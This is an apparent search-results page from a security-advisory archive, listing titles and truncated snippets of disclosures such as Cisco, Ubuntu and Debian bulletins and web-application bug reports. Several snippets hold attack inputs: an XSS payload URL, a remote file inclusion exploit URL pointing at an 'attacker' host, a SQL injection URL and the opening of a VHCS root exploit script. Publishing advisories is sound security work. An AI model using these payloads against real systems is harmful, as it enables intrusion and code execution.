47153 matches found
Cisco Security Advisory: Cisco Content Services Gateway Vulnerabilities
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 Cisco Security Advisory: Cisco Content Services Gateway Vulnerabilities Advisory ID: cisco-sa-20110126-csg2 http://www.cisco.com/warp/public/707/cisco-sa-20110126-csg2.shtml Revision 1.0 For Public Release 2011 January 26 1600 UTC GMT...
DCP-Portal Multiple XSS Vulnerabilities
Title: DCP-Portal Multiple XSS Vulnerabilities Vendor: Worxware Product: DCP-Portal Tested Version: 7.0beta Threat Class: XSS Severity: High Remote: yes Local: no Discovered By: Andrei Rimsa Alvares ===== Description ===== Multiple XSS vulnerabilities found in the DCP-Portal. 1...
SmartCMS v.2 SQL injection vulnerability
============ Ariko-Security - Advisory 1/5/2010 ============= SQL injection vulnerability in SmartCMS v.2 Vendor's Description of Software: http://www.smartwebsites.com.cy/index.php?pageid=13&lang=en Dork: n/a Application Info: Name: SmartCMS Versions: V.2 Vulnerability Info: Type: SQL injection...
Google Chrome, Mozilla Firefox, Opera, Internet Explorer browsers DoS
Calling window.print function in loop causes browser to hang. Uncontrollable memory allocation. Script can close window without user approval...
[USN-612-2] OpenSSH vulnerability
=========================================================== Ubuntu Security Notice USN-612-2 May 13, 2008 openssh vulnerability CVE-2008-0166, http://www.ubuntu.com/usn/usn-612-1 =========================================================== A weakness has been discovered in the random number...
phpTournois <= G4 Remote File Upload/Code Execution Exploit
?php / Name: phpTournois = G4 Remote File Upload/Code Execution Exploit Credits: Charles "real" F. charlesfolathotmail.fr Date: 04-06-08 - Remote Code Execution - Remote File Upload When testing if we are admin, phpTournois checks if $grade'a'=='a'. But when we are not loggued in, this var is not...
Horde Webmail file inclusion proof of concept & patch.
Horde 3.1.6 arbitrary file inclusion vulnerability, proof of concept & patch. A severe security vulnerability affects any unix distribution running version 3.1.6 of the Horde webmail client included in most popular webhosting control panels. All previous versions are also affected and it is...
123 Flash Chat Module for phpBB
Script : 123 Flash Chat Module for phpBB Discovered By : F10 Contact : [email protected] Site : http://by-f10.com Greetz : byemR3 , H0tturk , TaRanTuLa , gsy , ercu145 , LupuS , m0sted , CyberGhost ... . From : Turkey Download : http://php.arsivimiz.com/indir.php?ID=996&sIslem=Indir The bugs are ...
Cacti 0.8.7a Multiple Vulnerabilities
Cacti 0.8.7a Multiple Vulnerabilities Name Multiple Vulnerabilities in Cacti Systems Affected Cacti 0.8.7a and possibly earlier versions Severity High Impact CVSSv2 High 9/10, vector: AV:N/AC:L/Au:N/C:C/I:P/A:P Vendor http://www.cacti.net/ Advisory...
dvddb-0.6 media remote file include vuln.
Title : dvddb-0.6 media remote file include vuln. Author : Blaster Download : http://globalmegacorp.org/dvddb/dvddb-0.6.zip Contact : [email protected] Vuln Code: require$config /"themes"; ExpLoit : http://target/path/inc/common.php?config=attacker GreetZ: BLaCKWHITE, HackerBox.Eu...
net2ftp: a web based FTP client :) <= Remote File Inclusion
+-------------------------------------------------------------------- + + net2ftp: a web based FTP client : = Remote File Inclusion + +-------------------------------------------------------------------- + + Affected Software .: net2ftp: a web based FTP client + Venedor ...........:...
Уязвимость в Денвере-2: XSS
Здравствуйте, vuln. Найдена уязвимость типа XSS в пакете для web-разработчика Денвер-2 http://www.denwer.ru/ Пример: www.site.ru/scriptalert'XSS!'/script появится страница с сообщением об ошибке 403 и выполнится скрипт Уязвимость возможна из-за ошибки в файле, появляющемся при ошибке 403. Его...
Etherleak information leak in Windows Server 2003 drivers
NGSSoftware Insight Security Research Advisory Name: Etherleak information leak in Windows Server 2003 drivers Systems Affected: Windows Server 2003 all versions Severity: Low/Medium Risk Vendor URL: http://www.microsoft.com/windowsserver2003/ Author: Chris Paget [email protected] Date: 9th...
Mod_gzip Debug Mode Vulnerabilities
Multiple Vulnerabilities in modgzip Debugging Routines I. Synopsis Affected Systems: modgzip 1.3.26.1a and prior Risk: Development: High Production: Minimal Developer URL: http://www.sourceforge.net/projects/mod-gzip Status: Vendor is not supporting project at this time. II. Product Description...
ASLabs-2001-01: Multiple Security Problems in eEye SecureIIS
=== Alliance Security Labs === === ASLabs-2001-01: Multiple Security Problems in eEye SecureIIS === Advisory ID: ASLabs-2001-01 Vendor: eEye http://www.eEye.com Product: SecureIIS http://www.eeye.com/html/Products/SecureIIS/index.html Versions: v1.0.2 latest available - probably relevant for 1.0....
AnalogX Proxy DoS
Foundstone, Inc. http://www.foundstone.com "Securing the Dot Com World" Security Advisory AnalogX Proxy DoS ---------------------------------------------------------------------- FS Advisory ID: FS-072500-7-ANA.txt Release Date: July 25, 2000 Product: Proxy Vendor: AnalogX http://www.analogx.com...
15 TOTOLINK router models vulnerable to multiple RCEs
Hash: SHA512 Advisory Information Title: 15 TOTOLINK router models vulnerable to multiple RCEs Advisory URL: https://pierrekim.github.io/advisories/2015-totolink-0x00.txt Blog URL: https://pierrekim.github.io/blog/2015-07-16-15-TOTOLINK-products-vulnerable-to-multiple-RCEs.html Date published:...
CVE-2014-3446 - Unauthenticated Blind SQL Injection in BSS Continuity CMS
Vulnerability title: Unauthenticated Blind SQL Injection in BSS Continuity CMS CVE: CVE-2014-3446 Vendor: BSS Product: Continuity CMS Affected version: 4.2.22640.0 Fixed version: N/A Reported by: Jerzy Kramarz Details: he following URL and parameters have been confirmed to suffer from Blind SQL...
[SECURITY] CVE-2014-0096 Apache Tomcat information disclosure
CVE-2014-0096 Information Disclosure Severity: Important Vendor: The Apache Software Foundation Versions Affected: - Apache Tomcat 8.0.0-RC1 to 8.0.3 - Apache Tomcat 7.0.0 to 7.0.52 - Apache Tomcat 6.0.0 to 6.0.39 Description: The default servlet allows web applications to define at multiple leve...
Security update available for Adobe Shockwave Player
Security update available for Adobe Shockwave Player Release date: February 14, 2012 Vulnerability identifier: APSB12-02 CVE number: CVE-2012-0757, CVE-2012-0758, CVE-2012-0759, CVE-2012-0760, CVE-2012-0761, CVE-2012-0762, CVE-2012-0763, CVE-2012-0764, CVE-2012-0766 Platform: Windows and Macintos...
HP Network Node Manager i information leakage
No description provided...
HTB22913: Multiple CSRF (Cross-Site Request Forgery) in UseBB
Vulnerability ID: HTB22913 Reference: http://www.htbridge.ch/advisory/multiplecsrfcrosssiterequestforgeryinusebb.html Product: UseBB Vendor: UseBB http://www.usebb.net/ Vulnerable Version: 1.0.11 Vendor Notification: 22 March 2011 Vulnerability Type: CSRF Cross-Site Request Forgery Risk level: Lo...
AWCM v2.2 Auth Bypass Vulnerabilities
AWCM v2.2 Auth Bypass Vulnerabilities / / / / L /' / , / / /' , / /' /' / /' / / / / / / L / / / // // // ///////////L // ////// // //...
[security bulletin] HPSBMA02534 SSRT090180 rev.1 - HP System Management Homepage (SMH) for Linux and Windows, Remote Unauthorized Information Disclosure, Unauthorized Data Modification, Denial of Service (DoS)
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c02171256 Version: 1 HPSBMA02534 SSRT090180 rev.1 - HP System Management Homepage SMH for Linux and Windows, Remote Unauthorized Information Disclosure, Unauthorized Data Modification, Denial of...
PHP proc_open() safe_mode bypass
It's possible to execute any code from shared library via procopen...
Microsoft Security Bulletin MS08-040 – Important Vulnerabilities in Microsoft SQL Server Could Allow Elevation of Privilege (941203)
Microsoft Security Bulletin MS08-040 – Important Vulnerabilities in Microsoft SQL Server Could Allow Elevation of Privilege 941203 Published: July 8, 2008 Version: 1.0 General Information Executive Summary This security update resolves four privately disclosed vulnerabilities. The more serious of...
XSS Vulnerabilities in Common Shockwave Flash Files
Hi. Recently, there has been news regarding Flash authoring tools and XSS, but the articles contained little technical information. So, I created a detailed report at: http://docs.google.com/Doc?docid=ajfxntc4dmsq14dt57ssdw An abbreviated version intended for full-disclosure, bugtraq, and...
Cisco 7940 SIP IPPhones DoS
A sequence of malformed SIP requests causes device to crash...
Remot File Include In Aardvark Topsites PHP 5
By Hasadya Raed Contact : [email protected] Israel ---------------------------------------- Script : Aardvark Topsites PHP 5 Dork : "Copyright c 2003-2005 Jeremy Scheff. All rights reserved" --------------------------------------- B.Files : settingssql.php newday.php...
[NT] LBE Web HelpDesk SQL Injection
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com - - promotion The SecuriTeam alerts list - Free, Accurate, Independent. Get your security news from a reliable source...
Filesystem Access + VolanoChat = VChat admin (fwd)
Title: VolanoChatPro stores plain text password in a publicly accessible file. Date: November 4, 2000 Risk: Low. No system privileges are granted. Vendor Site: http://www.volano.com ================================================= VolanoChatPro, a widely used chat server on the Internet, allows...
Htgrep CGI Arbitrary File Viewing Vulnerability
Software: Htgrep URL: http://www.iam.unibe.ch/scg/Src/Doc/ Version: All Versions Platforms: Unix maybe Winnt? Author status: Notified Summary: Any remote user can view arbitrary files on the system with the privileges of the web user Vulnerability: The CGI allows a user to specify a header and...
APPLE-SA-2015-09-16-1 iOS 9
APPLE-SA-2015-09-16-1 iOS 9 iOS 9 is now available and addresses the following: Apple Pay Available for: iPhone 6, iPad mini 3, and iPad Air 2 Impact: Some cards may allow a terminal to retrieve limited recent transaction information when making a payment Description: The transaction log...
[Multiple CVE's]: various critical vulnerabilities in SysAid Help Desk (RCE, file download, DoS, etc)
Hi, tl;dr Found lots of vulns in SysAid Help Desk 14.4, including RCE. SysAid have informed me they all have been fixed in 15.2, but no re-test was performed. Full advisory below, and a copy can be obtained at 1. 5 Metasploit modules have been released and currently awaiting merge in the moderati...
[SECURITY] [DSA 3109-1] firebird2.5 security update
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 - ------------------------------------------------------------------------- Debian Security Advisory DSA-3109-1 [email protected] http://www.debian.org/security/ Salvatore Bonaccorso December 21, 2014 http://www.debian.org/security/faq -...
CVE-2014-3445 - Unauthenticated Backup and Password Disclosure in HandsomeWeb SOS Webpages
Vulnerability title: Unauthenticated Backup and Password Disclosure in HandsomeWeb SOS Webpages CVE: CVE-2014-3445 Vendor: HandsomeWeb Product: SOS Webpages Affected version: 1.1.11 and earlier Fixed version: 1.1.12 Reported by: Freakyclown Details: The default setup allows an unauthenticated use...
Deutsche Telekom CERT Advisory [DTC-A-20140324-001] vulnerabilities in cacti
Deutsche Telekom CERT Advisory DTC-A-20140324-001 Summary: Three vulnerabilities were found in cacti version 0.8.7g. The vulnerabilities are: 1 Stored Cross-Site Scripting XSS via URL 2 Missing CSRF Cross-Site Request Forgery token allows execution of arbitrary commands 3 The use of exec-like...
Joomla! VirtueMart component <= 2.0.22a - SQL Injection
------------------------------------------------------------ Joomla! VirtueMart component = 2.0.22a - SQL Injection ------------------------------------------------------------ == Description == - Software link: http://www.virtuemart.net/ - Affected versions: All versions between 2.0.8 and 2.0.22...
Tftpd32 DNS Server Denial Of Service Vulnerability
Title: Tftpd32 DNS Server Denial Of Service Vulnerability Software : Tftpd32 Software Version : v4.00 Vendor: http://tftpd32.jounin.net/ Vulnerability Published : 2012-05-26 Vulnerability Update Time : Status : Impact : MediumCVSS2 Base : 5.0, AV:N/AC:L/Au:N/C:N/I:N/A:P Bug Description : Tftpd32 ...
appRain CMF v0.1.5 - Multiple Web Vulnerabilities
Title: ====== appRain CMF v0.1.5 - Multiple Web Vulnerabilities Date: ===== 2011-12-17 References: =========== http://www.vulnerability-lab.com/getcontent.php?id=362 VL-ID: ===== 362 Introduction: ============= appRain is one of the first officially released Opensource Content Management Framewor...
[security bulletin] HPSBMU02714 SSRT100244 rev.2 - HP Network Node Manager i (NNMi) for HP-UX, Linux, Solaris, and Windows, Remote Unauthorized Disclosure of Information
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c03057508 Version: 2 HPSBMU02714 SSRT100244 rev.2 - HP Network Node Manager i NNMi for HP-UX, Linux, Solaris, and Windows, Remote Unauthorized Disclosure of Information NOTICE: The information in...
[ONSEC-09-010] Undersky CMS SQL injection
ONSEC-09-010 Undersky CMS SQL injection Цель: Undersky CMS http://www.undersky.ru Тип: SQL инъекция Угроза: Высокая Дата обнаружения: 03.07.2009 Дата оповещения разработчика: 03.07.2009 Дата выхода исправления: 05.07.2009 Автор: Vladimir Vorontsov OnSec Russian Security Group onsec dot ru Описани...
Reporting new vulnerabilities
Hi SecurityVulns team, I write to report three vulnerabilities that I found in the last version of Aardvark Topsites PHP5.2.1 and older versions. The cause of all of them is the incorrect verification of input parameters. Here are the vulnerabilities: ================== HTML Injection up to 5.2.0...
VHCS <= 2.4.7.1 (vhcs2_daemon) Remote Root Exploit
!/usr/bin/php -q ?php This file requires the PhpSploit class. If you want to use this class, the latest version can be downloaded from acid-root.new.fr. errorreportingEALL ^ ENOTICE; require'phpsploitclass.php'; darkfig@darky:/ ./vhcssploit.php -url http://localhost/vhcs2/ VHCS = 2.4.7.1...
SQL-injection, XSS in OSSIM (Open Source Security Information Management)
Application: OSSIM http://www.ossim.net Version: 0.9.9rc5 Note: it is possible that the problem affects also earlier OSSIM versions Platforms: Linux Bug: SQL injection, Cross Site Scripting Exploitation: remote Date: 21 Feb 2008 Author: Marcin Kopec E-mail: marcindotkopecathotmaildotcom...
Aria-Security.Net: MetaCart SQL Injection
Aria-Security Team, http://Aria-Security.net ------------------------------- Shout Outs: AurA, imm02tal Vendor: http://metalinks.com/ http://site.ltd/metacartpath/productsByCategory.asp?intCatalogID='SQL INJECTION Regards, The-0utl4w Credits Goes To Aria-Security.Net...
[Full-disclosure] PHP 5.2.3 PHP 4.4.7, htaccess safemode and open_basedir Bypass Vulnerability
Source: http://securityreason.com/achievementsecurityalert/45 -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 PHP 5.2.3 PHP 4.4.7, htaccess safemode and openbasedir Bypass Vulnerability Author: Maksymilian Arciemowicz cXIb8O3 SecurityReason Date: - - Written: 10.02.2007 - - Public: 27.06.2007...
[SA18473] RedKernel Referrer Tracker "rkrt_stats.php" Cross-Site Scripting
TITLE: RedKernel Referrer Tracker "rkrtstats.php" Cross-Site Scripting SECUNIA ADVISORY ID: SA18473 VERIFY ADVISORY: http://secunia.com/advisories/18473/ CRITICAL: Less critical IMPACT: Cross Site Scripting WHERE: From remote SOFTWARE: RedKernel Referrer Tracker 1.x http://secunia.com/product/682...
DC++ and its mods remote DoS in bzip2 decompression routine
DC++ and its mods remote DoS in bzip2 decompression routine Critical Security research: http://www.critical.lt Original advisory may be found: http://www.critical.lt/?vulnerabilities/22 PoC file may be found here: http://www.critical.lt/research/dc.zip Vulnerable product: DC++ and its mods all...
Security Advisory: FreeBSD-SA-00:24.libedit
-----BEGIN PGP SIGNED MESSAGE----- ============================================================================= FreeBSD-SA-00:24 Security Advisory FreeBSD, Inc. Topic: libedit reads config file from current directory Category: core Module: libedit Announced: 2000-07-05 Affects: All versions of...